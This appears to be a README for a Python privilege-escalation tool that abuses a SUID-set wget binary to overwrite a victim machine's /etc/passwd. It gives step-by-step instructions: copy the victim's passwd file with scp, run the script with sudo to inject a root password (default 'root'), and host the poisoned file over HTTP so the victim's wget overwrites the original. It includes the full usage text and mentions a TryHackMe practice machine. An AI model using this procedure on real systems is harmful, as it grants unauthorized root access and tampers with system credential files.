If the wget binary has the SUID bit set, It does not drop the elevated privileges and may be abused to access the file system. It may be used to do privileged writes or write files outside a restricted file system. This script automates the rewriting of the passwd
file of the victims machine
Firstly copy the /etc/passwd
file of the victim to your host machine, using the following command:
scp user@host /etc/passwd .
( /etc/passwd
file)
After copying the /etc/passwd
file of the victim, it is time to run the exploit.
( sudo
since root privileges are needed to modify the /etc/passwd
file of the victim because of permission reasons)
usage: sudo wget_exploit.py [-h] [--file FILE] [--interface INTERFACE] [--port PORT] [--password PASSWORD]
Poison the victims /etc/passwd file and host it over HTTP. Overwrite the /etc/passwd file of the victim by abusing the SUID bit of the wget binary.
options:
-h, --help show this help message and exit
--file FILE, -f FILE passwd file to poison
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
--password PASSWORD, -P PASSWORD
password to set for the root user (default: root)
The script will poison the <passwd copy>
file, by adding the new root
password.
Then it will host the <passwd copy>
file to the web using a custom reuseable python HTTP server.
Dynamic instructions will also be printed at the command line during the exploit execution as shown in the picture below.
The password for the root
user, is simply root
.
TryHackMe has an awesome machine that lets you play with this exploit.